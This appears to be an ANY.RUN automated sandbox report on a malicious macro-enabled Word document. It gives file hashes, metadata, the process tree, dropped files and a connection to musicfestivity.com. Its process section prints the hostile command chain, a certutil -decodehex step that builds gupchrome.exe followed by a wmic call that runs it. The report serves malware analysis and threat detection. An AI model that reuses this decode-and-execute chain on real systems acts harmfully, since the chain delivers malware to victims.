analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

17643ef8531d876f766d3677f96e0a1a235c8773ce3a649cea9dc7777d2b2798

Full analysis: https://app.any.run/tasks/ae1f06a0-9410-4ff7-bc54-ee18664f7168
Verdict: Malicious activity
Analysis date: November 15, 2018, 12:06:32
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

4CA56C434FFD7ABE9D255F6ED98EF039

SHA1:

D62B8C47D8840F7268D5C7D1AA770F3A70500EAA

SHA256:

17643EF8531D876F766D3677F96E0A1A235C8773CE3A649CEA9DC7777D2B2798

SSDEEP:

12288:qgSneLLfuZKMI8rpvsIrk/5i/UJGXrL03WVZXsGH3A9KFy5mEo8qOF3sIv/Q9I0:+nevWI8rpHk/5uX4WVZqKCmGqOFbUf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • gupchrome.exe (PID: 3640)

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 4060)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 4060)

  • SUSPICIOUS

    • Starts CertUtil for decode files

      • cmd.exe (PID: 3080)

    • Uses WMIC.EXE to create a new process

      • cmd.exe (PID: 3080)

    • Executable content was dropped or overwritten

      • certutil.exe (PID: 3620)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 4060)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 4060)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

XML

AppVersion: 16
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 71707
LinksUpToDate: No
Company: -
TitlesOfParts: Protected document
HeadingPairs:
  • Title
  • 1
ScaleCrop: No
Paragraphs: 143
Lines: 509
DocSecurity: None
Application: Microsoft Office Word
Characters: 61127
Words: 10723
Pages: 23
TotalEditTime: 2.5 hours
Template: Normal.dotm
ModifyDate: 2018:10:10 03:24:00Z
CreateDate: 2018:08:22 09:56:00Z
RevisionNumber: 226
LastModifiedBy: Paranoid Ninja
Keywords: -

XMP

Description: -
Creator: Paranoid Ninja
Subject: -
Title: Protected document

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1900
ZipCompressedSize: 436
ZipCRC: 0x928413df
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
5
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs certutil.exe wmic.exe no specs gupchrome.exe

Process information

PID
CMD
Path
Indicators
Parent process
4060"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\17643ef8531d876f766d3677f96e0a1a235c8773ce3a649cea9dc7777d2b2798.docm"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3080cmd /c certutil.exe -decodehex %temp%\gupchrome.txt %temp%\gupchrome.exe & wmic path win32_process call create %temp%\gupchrome.exeC:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3620certutil.exe -decodehex C:\Users\admin\AppData\Local\Temp\gupchrome.txt C:\Users\admin\AppData\Local\Temp\gupchrome.exe C:\Windows\system32\certutil.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2876wmic path win32_process call create C:\Users\admin\AppData\Local\Temp\gupchrome.exeC:\Windows\System32\Wbem\WMIC.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3640C:\Users\admin\AppData\Local\Temp\gupchrome.exeC:\Users\admin\AppData\Local\Temp\gupchrome.exe
wmiprvse.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Total events
1 234
Read events
608
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
0
Text files
4
Unknown types
4

Dropped files

PID
Process
Filename
Type
4060WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9956.tmp.cvr
MD5:
SHA256:
4060WINWORD.EXEC:\Users\admin\AppData\Local\Temp\mso9CE2.tmp
MD5:
SHA256:
4060WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:D333850E5B5EA2164AFBBA41A7AEAA81
SHA256:496D3B03A52C1D4457BDFF65E718070B2E1FA0E7186AA5920AC97684CB12DD33
4060WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\17643ef8531d876f766d3677f96e0a1a235c8773ce3a649cea9dc7777d2b2798.docm.LNKlnk
MD5:633DD635AFECD1CA9FDC7906B1DF8AA4
SHA256:A99C9894746CA785D4D33C10F04A22C5DD483E3860820C71C20387FFB30CF3D3
4060WINWORD.EXEC:\Users\admin\Desktop\~$643ef8531d876f766d3677f96e0a1a235c8773ce3a649cea9dc7777d2b2798.docmpgc
MD5:9B7AD97652A83D597C5D84C4B907D448
SHA256:0150D4CF4CE4C5A81D1261AC6F4464AC697242003D741D8B57FA86AFDD2C8D08
4060WINWORD.EXEC:\Users\admin\AppData\Local\Temp\gupchrome.txttext
MD5:4166BB3E767D23790A52085B506C0A99
SHA256:00B7D32DA6360D1A39D8EFB45FE1B0B8FD23928DE9C7D36131D8D2FC0A4778EB
4060WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:8A9EEB0C986DEB804A8C45636AE0FDF9
SHA256:AE6D663A6E596E536D82B409E579EA36F3BD6DE6DCA0AC725C06B50D2A929780
3620certutil.exeC:\Users\admin\AppData\Local\Temp\gupchrome.exeexecutable
MD5:851009E4F6A6B1D614E407B11257AC42
SHA256:0F760B5951709C6299DA5C467C07B4B77722FDA60DED3C8D050DFA824DD37174
4060WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lextext
MD5:F3B25701FE362EC84616A93A45CE9998
SHA256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3640
gupchrome.exe
23.101.8.251:443
musicfestivity.com
Microsoft Corporation
HK
unknown

DNS requests

Domain
IP
Reputation
musicfestivity.com
  • 23.101.8.251
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
17643ef8531d876f766d3677f96e0a1a235c8773ce3a649cea9dc7777d2b2798